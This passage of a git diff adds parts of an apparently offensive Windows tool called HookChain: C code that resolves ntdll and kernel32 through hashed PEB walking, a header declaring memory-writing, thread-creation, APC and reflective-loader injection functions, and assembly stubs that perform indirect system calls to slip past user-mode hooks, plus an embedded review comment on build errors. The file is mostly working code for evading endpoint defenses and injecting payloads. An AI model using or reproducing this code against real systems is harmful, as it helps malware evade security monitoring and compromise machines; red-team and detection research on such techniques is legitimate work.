+ return AH(HeapHandle, Flags, Size);
+}
+
+DWORD64 djb2(PBYTE str)
+{
+ DWORD64 dwHash = 0x7734773477347734;
+ INT c;
+
+ while (c = (INT)((char)*str++))
+ dwHash = ((dwHash << 0x5) + dwHash) + c;
+
+ return dwHash;
+}
+
+BOOL GetBaseAddresses(VOID)
+{
+ if (ntdllBase && kernel32Base && kernelbaseBase)
+ return TRUE;
+
+ // the kernels base address and later this images newly loaded base address
+ ULONG_PTR uiBaseAddress;
+
+ PPEB pCurrentPeb;
+ PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+
+ PLIST_ENTRY pEntry = NULL;
+ PLIST_ENTRY pHeadEntry = NULL;
+
+ // get the Process Enviroment Block
+
+ pCurrentPeb = NtCurrentPeb();
+
+ if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ return NULL;
+
+ // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+ uiBaseAddress = (ULONG_PTR)pCurrentPeb->LoaderData;
+
+ DWORD64 idx = ModList.Count;
+ if (idx == 0) {
+ idx = 1;
+ ModList.Count = 1;
+ }
+
+ pHeadEntry = &pCurrentPeb->LoaderData->InMemoryOrderModuleList;
+ pEntry = pHeadEntry->Flink;
+ while (pEntry != pHeadEntry)
+ {
+
+ pLdrDataEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
+ PWCHAR pcName = pLdrDataEntry->BaseDllName.Buffer;
+ DWORD64 dwHash = djb2((PBYTE)pLdrDataEntry->BaseDllName.Buffer);
+
+ // compare the hash with that of kernel32.dll -> 0x5DC35DC35DC35DFF
+ if (dwHash == 0x5DC35DC35DC35DFF)
+ {
+ kernel32Base = (FARPROC)pLdrDataEntry->DllBase;
+ }
+ // compare the hash with that of ntdll.dll -> 0x5DC35DC35DC35E22
+ else if (dwHash == 0x5DC35DC35DC35E22)
+ {
+ ntdllBase = (FARPROC)pLdrDataEntry->DllBase;
+
+ //ntdll always should be the first
+ ModList.Entries[0].pAddress = (PVOID)pLdrDataEntry->DllBase;
+ ModList.Entries[0].dwHash = dwHash;
+ }
+
+ BOOL f = FALSE;
+ for (DWORD i = 0; i < ModList.Count; i++)
+ {
+ if (((DWORD64)ModList.Entries[i].pAddress == (DWORD64)pLdrDataEntry->DllBase) || (dwHash == ModList.Entries[i].dwHash))
+ {
+ f = TRUE;
+ break;
+ }
+ }
+
+ if (!f) {
+ ModList.Entries[ModList.Count].pAddress = (PVOID)pLdrDataEntry->DllBase;
+ ModList.Entries[ModList.Count].dwHash = dwHash;
+ ModList.Count++;
+ }
+
+ // we stop searching when we have found everything we need.
+ if (ntdllBase && kernel32Base)
+ break;
+
+ // get the next entry
+ pEntry = pEntry->Flink;
+
+ }
+
+ if (!ntdllBase) {
+ ntdllBase = GetClearNtdll();
+ ModList.Entries[0].pAddress = ntdllBase;
+ ModList.Entries[0].dwHash = 0x5DC35DC35DC35E22;
+ }
+
+ if (!kernelbaseBase)
+ kernelbaseBase = LoadLibraryA("kernelbase");
+
+ if (ntdllBase && kernel32Base && kernelbaseBase)
+ return TRUE;
+
+ return FALSE;
+}
+
+//Look for a clear version of NTDLL
+PVOID GetClearNtdll(VOID)
+{
+
+ // the kernels base address and later this images newly loaded base address
+ ULONG_PTR uiBaseAddress;
+ PPEB pCurrentPeb;
+ PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+ PLIST_ENTRY pEntry = NULL;
+ PLIST_ENTRY pHeadEntry = NULL;
+
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID pBase;
+ PDWORD pdwFunctions;
+ PDWORD pdwNames;
+ PWORD pwNameOrdinals;
+ LPCSTR pcName = NULL;
+ PVOID pAddress = NULL;
+
+ // get the Process Enviroment Block
+
+ pCurrentPeb = NtCurrentPeb();
+
+ if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ return NULL;
+
+ // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+ uiBaseAddress = (ULONG_PTR)pCurrentPeb->LoaderData;
+
+ pHeadEntry = &pCurrentPeb->LoaderData->InMemoryOrderModuleList;
+ pEntry = pHeadEntry->Flink;
+ while (pEntry != pHeadEntry)
+ {
+
+ pLdrDataEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
+ PWCHAR pcName = pLdrDataEntry->BaseDllName.Buffer;
+ //DWORD64 dwHash = djb2((PBYTE)pLdrDataEntry->BaseDllName.Buffer);
+
+ pBase = pLdrDataEntry->DllBase;
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ goto nextmod;
+
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ goto nextmod;
+
+ if (pImageNtHeaders->OptionalHeader.DataDirectory[0].Size == 0)
+ goto nextmod;
+
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+ pdwFunctions = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfFunctions);
+ pdwNames = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNames);
+ pwNameOrdinals = (PWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+ //LPCSTR
+ int cnt = 0;
+
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+ pcName = (PCHAR)((PBYTE)pBase + pdwNames[i]);
+
+ // Is this a system call?
+ if ((*(USHORT*)pcName != 'tN'))
+ continue;
+
+ cnt++;
+ }
+
+ if (cnt > 200)
+ return pBase;
+
+ nextmod:
+ // get the next entry
+ pEntry = pEntry->Flink;
+ }
+
+ return NULL;
+}
diff --git a/HookChain/HookChain/hook.h b/HookChain/HookChain/hook.h
new file mode 100644
index 0000000..9509e61
--- /dev/null
+++ b/HookChain/HookChain/hook.h
@@ -0,0 +1,115 @@
+//===============================================================================================//
+#ifndef _OKCHAIN_OK_H
+#define _OKCHAIN_OK_H
+//===============================================================================================//
+
+#include
+#include "windows_common.h"
+
+#define DEBUG
+//#undef DEBUG
+
+#define MAX_ENTRIES 512
+#define PREV -32
+#define NEXT 32
+#define MAX_NEIGHBOURS 500
+
+typedef struct _SYSCALL_INFO {
+ DWORD64 dwSsn;
+ PVOID pAddress;
+ PVOID pSyscallRet;
+ PVOID pStubFunction;
+ DWORD64 dwHash;
+ BOOL bIsHooked;
+} SYSCALL_INFO, * PSYSCALL_INFO;
+
+typedef struct _SYSCALL_LIST
+{
+ DWORD64 Count;
+ SYSCALL_INFO Entries[MAX_ENTRIES];
+} SYSCALL_LIST, * PSYSCALL_LIST;
+
+typedef struct _FUNCTION_CODE {
+ BYTE Buffer[40];
+} FUNCTION_CODE, * PFUNCTION_CODE;
+
+typedef struct _MODULE_INFO {
+ PVOID pAddress;
+ DWORD64 dwHash;
+} MODULE_INFO, * PMODULE_INFO;
+
+typedef struct _MODULE_LIST
+{
+ DWORD64 Count;
+ MODULE_INFO Entries[MAX_ENTRIES];
+} MODULE_LIST, * PMODULE_LIST;
+
+typedef struct _FUNCTION_NAME {
+ BYTE Buffer[255];
+} FUNCTION_NAME, * PFUNCTION_NAME;
+
+typedef struct _NAME_LIST
+{
+ DWORD64 Count;
+ FUNCTION_NAME Entries[50];
+} NAME_LIST, * PNAME_LIST;
+
+
+
+static PVOID GetNextSyscallInstruction(_In_ PVOID pStartAddr);
+static DWORD64 GetSSN(_In_ PVOID pAddress);
+FARPROC HGetModuleHandleA(LPCSTR imageName, _In_ BOOLEAN forceLoad);
+FARPROC HGetProcAddress(LPCSTR imageName, LPCSTR procName);
+FARPROC HGetProcAddress3(FARPROC imageBase, LPCSTR procName);
+BOOL UnhookAll(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force);
+BOOL ProcAllByAddr(_In_ LPCSTR imageBaseName, _In_ PVOID imageBase, _In_opt_ HANDLE hProcess);
+PVOID GetClearNtdll(VOID);
+
+BOOL GetBaseAddresses(VOID);
+BOOL InitApi(VOID);
+DWORD64 djb2(PBYTE str);
+
+typedef VOID(*PPS_APC_ROUTINE)(PVOID SystemArgument1, PVOID SystemArgument2, PVOID SystemArgument3, PCONTEXT ContextRecord);
+
+NTSTATUS NtAllocateReserveObject(_Out_ PHANDLE MemoryReserveHandle, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ MEMORY_RESERVE_OBJECT_TYPE ObjectType);
+NTSTATUS NtAllocateVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect);
+NTSTATUS NtCreateProcessEx(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ParentProcess, _In_ ULONG Flags, _In_opt_ HANDLE SectionHandle, _In_opt_ HANDLE DebugPort, _In_opt_ HANDLE ExceptionPort, _In_ BOOLEAN InJob);
+NTSTATUS NtCreateThreadEx(_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle, _In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags, _In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize, _In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList);
+NTSTATUS NtOpenProcess(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK AccessMask, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ PCLIENT_ID ClientId);
+NTSTATUS NtQueryInformationProcess(_In_ HANDLE ProcessHandle, _In_ PROCESS_INFORMATION_CLASS ProcessInformationClass, _Out_ PVOID ProcessInformation, _In_ ULONG ProcessInformationLength, _Out_ PULONG ReturnLength);
+NTSTATUS NtQueueApcThreadEx(_In_ HANDLE ThreadHandle, _In_ HANDLE UserApcReserveHandle, _In_ PPS_APC_ROUTINE ApcRoutine, _In_opt_ PVOID SystemArgument1, _In_opt_ PVOID SystemArgument2, _In_opt_ PVOID SystemArgument3);
+NTSTATUS NtProtectVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+NTSTATUS NtReadVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded);
+NTSTATUS NtResumeThread(_In_ HANDLE ThreadHandle, _Out_opt_ PULONG SuspendCount);
+NTSTATUS NtWaitForSingleObject(_In_ HANDLE ObjectHandle, _In_ BOOLEAN Alertable OPTIONAL, _In_ PLARGE_INTEGER TimeOut);
+NTSTATUS NtWriteVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ PVOID Buffer, _In_ ULONG NumberOfBytesToWrite, _Out_opt_ PULONG NumberOfBytesWritten);
+
+BOOL HReadProcessMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded);
+BOOL HVirtualProtect(_Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+BOOL HVirtualProtectEx(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection);
+SIZE_T HVirtualQuery(_In_ PVOID lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength);
+SIZE_T HVirtualQueryEx(_In_ HANDLE hProcess, _In_ PVOID lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength);
+
+// Local defs
+
+DWORD InitSyscallInfo(PSYSCALL_INFO pSyscallInfo, PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, DWORD64 dwHash);
+ULONG InjectMemory(HANDLE ProcessHandle, PVOID DestinationAddress, ULONG NumberOfBytesToWrite);
+PVOID GetReflectiveLoader(PVOID pModuleBase);
+PVOID RtlAllocateHeapStub(_In_ PVOID HeapHandle, _In_ ULONG Flags, _In_ SIZE_T Size);
+
+static PVOID pRtlAllocateHeap;
+static PVOID pUn;
+#if _WIN64
+#define NtCurrentTeb() ((PTEB)__readgsqword(0x30))
+#else
+#define NtCurrentTeb() ((PTEB)__readfsdword(0x16))
+#endif
+
+#define NtCurrentPeb() (NtCurrentTeb()->ProcessEnvironmentBlock)
+#define RtlProcessHeap() (NtCurrentPeb()->ProcessHeap)
+
+#define Local() ((HANDLE)-1)
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
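Review bot: The prototypes for `HGetProcAddress`, `HVirtualQuery` and `HVirtualQueryEx` in this header do not match the definitions the same commit adds in hook.c, where `HGetProcAddress` takes `(FARPROC imageBase, LPCSTR procName, _In_opt_ DWORD64 procHash)` and the two VirtualQuery wrappers take `PVOID* lpAddress`; a C translation unit that includes hook.h next to those definitions should fail with conflicting types, so the declarations should read `FARPROC HGetProcAddress(FARPROC imageBase, LPCSTR procName, _In_opt_ DWORD64 procHash);` and `SIZE_T HVirtualQuery(_In_ PVOID* lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength);` (and likewise for the Ex variant). `static PVOID pRtlAllocateHeap;` in a header gives every including translation unit its own zero-initialised copy, so the `pRtlAllocateHeap == NULL` fallback in `RtlAllocateHeapStub` only reflects the assignment made in the one file that sets it; if more than one source file includes hook.h this should be `extern` here with a single definition in hook.c. `#define DEBUG` is unconditional, so the `printf` diagnostics in hook.c are compiled into every build; gating it on a build-system flag (`#ifndef NDEBUG` or a project define) would keep non-debug binaries quiet. The `__readfsdword(0x16)` in the non-`_WIN64` branch looks off — the 32-bit TEB self pointer is conventionally read at offset 0x18 — though that branch probably never compiles for this x64 project, so please confirm before changing it.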
diff --git a/HookChain/HookChain/hookchain.asm b/HookChain/HookChain/hookchain.asm
new file mode 100644
index 0000000..adff7de
--- /dev/null
+++ b/HookChain/HookChain/hookchain.asm
@@ -0,0 +1,4399 @@
+.data
+ qTableAddr QWORD 0h
+ qListEntrySize QWORD 30h
+ qStubEntrySize QWORD 14h
+ qUnhookAddr QWORD 0h
+ qUnhookAddr2 QWORD 0h
+ qPayloadAddr QWORD 0h
+ qPayloadSize QWORD 0h
+
+ qDebug QWORD 0h
+
+ qIdx0 QWORD 0h
+ qIdx1 QWORD 0h
+ qIdx2 QWORD 0h
+ qIdx3 QWORD 0h
+ qIdx4 QWORD 0h
+ qIdx5 QWORD 0h
+ qIdx6 QWORD 0h
+
+EXTERN PrintCall: PROC
+;EXTERN PayloadPointer: PROC
+;EXTERN payload: BYTE
+
+.code
+ Stop PROC
+ int 3
+ ret
+ Stop ENDP
+
+ GetZeroAddr PROC
+ jmp short st1
+
+ st2:
+ pop rax
+ ret
+
+ st1:
+ call st2
+ GetZeroAddr ENDP
+
+ RetZero PROC
+ xor rax, rax
+ ret
+ RetZero ENDP
+
+ SetDebug PROC
+ mov qDebug, rcx
+ xor rax, rax
+ ret
+ SetDebug ENDP
+
+ SetAddr PROC
+ mov qUnhookAddr, rcx
+ xor rax, rax
+ ret
+ SetAddr ENDP
+
+ ExecAddr PROC
+ mov rax, qUnhookAddr
+ test rax, rax
+ je e1
+ jmp rax
+ e1:
+ ret
+ ExecAddr ENDP
+
+ SetAddr2 PROC
+ mov qUnhookAddr2, rcx
+ xor rax, rax
+ ret
+ SetAddr2 ENDP
+
+ ExecAddr2 PROC
+ mov rax, qUnhookAddr2
+ test rax, rax
+ je e1
+ jmp rax
+ e1:
+ ret
+ ExecAddr2 ENDP
+
+ SetPayloadData PROC
+ mov qPayloadAddr, rcx
+ mov qPayloadSize, rdx
+ xor rax, rax
+ ret
+ SetPayloadData ENDP
+
+ RtlCompareStringStub PROC
+ mov rax, 0h
+ ret
+ RtlCompareStringStub ENDP
+
+ RtlEqualStringStub PROC
+ mov rax, 1h
+ ret
+ RtlEqualStringStub ENDP
+
+ Caller PROC
+ mov rax, [rsp]
+ ret
+ Caller ENDP
+
+ Execute PROC
+ push rbp
+ mov rbp, rsp
+ mov rax, rcx
+ sub rsp, 20h
+ xor rdx, rdx
+ dec rdx
+ shl rdx, 4
+ and rsp, rdx
+ xor rdx, rdx
+ mov rcx, rdx
+ mov r8, rdx
+ mov r9, rdx
+ mov [rsp], rdx
+ mov [rsp + 08h], rdx
+ mov [rsp + 10h], rdx
+ mov [rsp + 18h], rdx
+ call rax
+ mov rsp, rbp
+ pop rbp
+ ret
+ Execute ENDP
+
+ SetIdx PROC
+ mov rax, 0h
+ lea r12, qIdx0
+ mov [r12 + rcx * 8], rdx
+ mov rax, 1h
+ ret
+ SetIdx ENDP
+
+ SetTableAddr PROC
+ xor rax, rax
+ mov qTableAddr, 0h
+ mov qTableAddr, rcx
+ call GetAddr
+ xor r11, r11
+ mov r14, rax
+ mov rcx, 200h
+ L1:
+ mov rax, r11
+ mov rdx, qStubEntrySize
+ mul rdx
+ push rcx
+ mov rcx, r11
+ lea rdx, [r14 + rax]
+ call SetIdxProc
+ pop rcx
+ inc r11
+ loop L1
+
+ mov rax, 1h
+ ret
+ SetTableAddr ENDP
+
+ SetIdxProc PROC
+ mov rax, rcx
+ mov r12, rdx
+ mov rdx, qListEntrySize
+ mul rdx
+ mov rdx, r12
+ mov r12, qTableAddr
+ lea rax, [r12 + rax]
+ mov [rax + 18h], rdx
+ ret
+ SetIdxProc ENDP
+
+ SyscallExec PROC
+
+ cmp qDebug, 01h ; Check if is DEBUG enabled
+ jne exec
+
+ ; Code responsible to do a callback to function PrintCall
+ push rsi
+ mov rsi, [rsp + 08h]
+ push rbp
+ push rax
+ push rcx
+ push rdx
+ push r8
+ push r9
+ mov rbp, rsp
+ mov rcx, rax
+ mov rdx, rsi
+ mov r8, rsp
+ sub rsp, 20h
+ call PrintCall
+ mov rsp, rbp
+ pop r9
+ pop r8
+ pop rdx
+ pop rcx
+ pop rax
+ pop rbp
+ pop rsi
+ ; finish print
+
+ exec:
+ sub rsp, 08h ; Address to place syscall addr and use with ret
+ push r12
+ push r9
+ push r8
+ push rdx
+ push rcx
+ push rbp
+ mov rbp, rsp
+
+
+ mov r12, rdx
+ mov rdx, qListEntrySize
+ mul rdx
+ mov rdx, r12
+ mov r12, qTableAddr
+ lea rax, [r12 + rax]
+ mov r12, [rax + 10h]
+ mov rax, [rax]
+
+ mov [rbp + 30h], r12 ; 0x30 = 6 * 8 = 48
+ mov rsp, rbp
+ pop rbp
+ pop rcx
+ pop rdx
+ pop r8
+ pop r9
+ pop r12
+
+ mov r10, rcx
+ ret ; jmp to the address saved at stack
+ SyscallExec ENDP
+
+ ; Functions used to the first Bypass
+ NtOpenProcessStub PROC
+ mov rax, qIdx0
+ jmp SyscallExec
+ ret
+ NtOpenProcessStub ENDP
+
+ NtProtectVirtualMemoryStub PROC
+ mov rax, qIdx1
+ jmp SyscallExec
+ ret
+ NtProtectVirtualMemoryStub ENDP
+
+ NtReadVirtualMemoryStub PROC
+ mov rax, qIdx2
+ jmp SyscallExec
+ ret
+ NtReadVirtualMemoryStub ENDP
+
+ NtWriteVirtualMemoryStub PROC
+ mov rax, qIdx3
+ jmp SyscallExec
+ ret
+ NtWriteVirtualMemoryStub ENDP
+
+ NtAllocateVirtualMemoryStub PROC
+ mov rax, qIdx4
+ jmp SyscallExec
+ ret
+ NtAllocateVirtualMemoryStub ENDP
+
+ NtDelayExecutionStub PROC
+ mov rax, qIdx5
+ jmp SyscallExec
+ ret
+ NtDelayExecutionStub ENDP
+
+ NtQueryVirtualMemoryStub PROC
+ mov rax, qIdx6
+ jmp SyscallExec
+ ret
+ NtQueryVirtualMemoryStub ENDP
+
+ GetData PROC
+ mov r10, rcx
+ mov r11, rdx
+ mov rdx, qListEntrySize
+ mul rdx
+ mov rdx, r12
+ mov r12, qTableAddr
+ lea rax, [r12 + rax]
+ lea r12, [rax + 10h]
+ mov [r10], rax
+ mov [r11], r12
+ mov rax, 1h
+ ret
+ GetData ENDP
+
+ GetAddr PROC
+ lea rax, OFFSET L1
+ inc rax
+ ret
+ L1:
+ db 90h
+ GetAddr ENDP
+
+ ; Jmp functions
+
+ Fnc0000 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0000h
+ ret
+ nop
+ Fnc0000 ENDP
+
+ Fnc0001 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0001h
+ ret
+ nop
+ Fnc0001 ENDP
+
+ Fnc0002 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0002h
+ ret
+ nop
+ Fnc0002 ENDP
+
+ Fnc0003 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0003h
+ ret
+ nop
+ Fnc0003 ENDP
+
+ Fnc0004 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0004h
+ ret
+ nop
+ Fnc0004 ENDP
+
+ Fnc0005 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0005h
+ ret
+ nop
+ Fnc0005 ENDP
+
+ Fnc0006 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0006h
+ ret
+ nop
+ Fnc0006 ENDP
+
+ Fnc0007 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0007h
+ ret
+ nop
+ Fnc0007 ENDP
+
+ Fnc0008 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0008h
+ ret
+ nop
+ Fnc0008 ENDP
+
+ Fnc0009 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0009h
+ ret
+ nop
+ Fnc0009 ENDP
+
+ Fnc000A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000ah
+ ret
+ nop
+ Fnc000A ENDP
+
+ Fnc000B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000bh
+ ret
+ nop
+ Fnc000B ENDP
+
+ Fnc000C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000ch
+ ret
+ nop
+ Fnc000C ENDP
+
+ Fnc000D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000dh
+ ret
+ nop
+ Fnc000D ENDP
+
+ Fnc000E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000eh
+ ret
+ nop
+ Fnc000E ENDP
+
+ Fnc000F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 000fh
+ ret
+ nop
+ Fnc000F ENDP
+
+ Fnc0010 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0010h
+ ret
+ nop
+ Fnc0010 ENDP
+
+ Fnc0011 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0011h
+ ret
+ nop
+ Fnc0011 ENDP
+
+ Fnc0012 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0012h
+ ret
+ nop
+ Fnc0012 ENDP
+
+ Fnc0013 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0013h
+ ret
+ nop
+ Fnc0013 ENDP
+
+ Fnc0014 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0014h
+ ret
+ nop
+ Fnc0014 ENDP
+
+ Fnc0015 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0015h
+ ret
+ nop
+ Fnc0015 ENDP
+
+ Fnc0016 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0016h
+ ret
+ nop
+ Fnc0016 ENDP
+
+ Fnc0017 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0017h
+ ret
+ nop
+ Fnc0017 ENDP
+
+ Fnc0018 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0018h
+ ret
+ nop
+ Fnc0018 ENDP
+
+ Fnc0019 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0019h
+ ret
+ nop
+ Fnc0019 ENDP
+
+ Fnc001A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001ah
+ ret
+ nop
+ Fnc001A ENDP
+
+ Fnc001B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001bh
+ ret
+ nop
+ Fnc001B ENDP
+
+ Fnc001C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001ch
+ ret
+ nop
+ Fnc001C ENDP
+
+ Fnc001D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001dh
+ ret
+ nop
+ Fnc001D ENDP
+
+ Fnc001E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001eh
+ ret
+ nop
+ Fnc001E ENDP
+
+ Fnc001F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 001fh
+ ret
+ nop
+ Fnc001F ENDP
+
+ Fnc0020 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0020h
+ ret
+ nop
+ Fnc0020 ENDP
+
+ Fnc0021 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0021h
+ ret
+ nop
+ Fnc0021 ENDP
+
+ Fnc0022 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0022h
+ ret
+ nop
+ Fnc0022 ENDP
+
+ Fnc0023 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0023h
+ ret
+ nop
+ Fnc0023 ENDP
+
+ Fnc0024 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0024h
+ ret
+ nop
+ Fnc0024 ENDP
+
+ Fnc0025 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0025h
+ ret
+ nop
+ Fnc0025 ENDP
+
+ Fnc0026 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0026h
+ ret
+ nop
+ Fnc0026 ENDP
+
+ Fnc0027 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0027h
+ ret
+ nop
+ Fnc0027 ENDP
+
+ Fnc0028 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0028h
+ ret
+ nop
+ Fnc0028 ENDP
+
+ Fnc0029 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0029h
+ ret
+ nop
+ Fnc0029 ENDP
+
+ Fnc002A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002ah
+ ret
+ nop
+ Fnc002A ENDP
+
+ Fnc002B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002bh
+ ret
+ nop
+ Fnc002B ENDP
+
+ Fnc002C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002ch
+ ret
+ nop
+ Fnc002C ENDP
+
+ Fnc002D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002dh
+ ret
+ nop
+ Fnc002D ENDP
+
+ Fnc002E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002eh
+ ret
+ nop
+ Fnc002E ENDP
+
+ Fnc002F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 002fh
+ ret
+ nop
+ Fnc002F ENDP
+
+ Fnc0030 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0030h
+ ret
+ nop
+ Fnc0030 ENDP
+
+ Fnc0031 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0031h
+ ret
+ nop
+ Fnc0031 ENDP
+
+ Fnc0032 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0032h
+ ret
+ nop
+ Fnc0032 ENDP
+
+ Fnc0033 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0033h
+ ret
+ nop
+ Fnc0033 ENDP
+
+ Fnc0034 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0034h
+ ret
+ nop
+ Fnc0034 ENDP
+
+ Fnc0035 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0035h
+ ret
+ nop
+ Fnc0035 ENDP
+
+ Fnc0036 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0036h
+ ret
+ nop
+ Fnc0036 ENDP
+
+ Fnc0037 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0037h
+ ret
+ nop
+ Fnc0037 ENDP
+
+ Fnc0038 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0038h
+ ret
+ nop
+ Fnc0038 ENDP
+
+ Fnc0039 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0039h
+ ret
+ nop
+ Fnc0039 ENDP
+
+ Fnc003A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003ah
+ ret
+ nop
+ Fnc003A ENDP
+
+ Fnc003B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003bh
+ ret
+ nop
+ Fnc003B ENDP
+
+ Fnc003C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003ch
+ ret
+ nop
+ Fnc003C ENDP
+
+ Fnc003D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003dh
+ ret
+ nop
+ Fnc003D ENDP
+
+ Fnc003E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 003eh
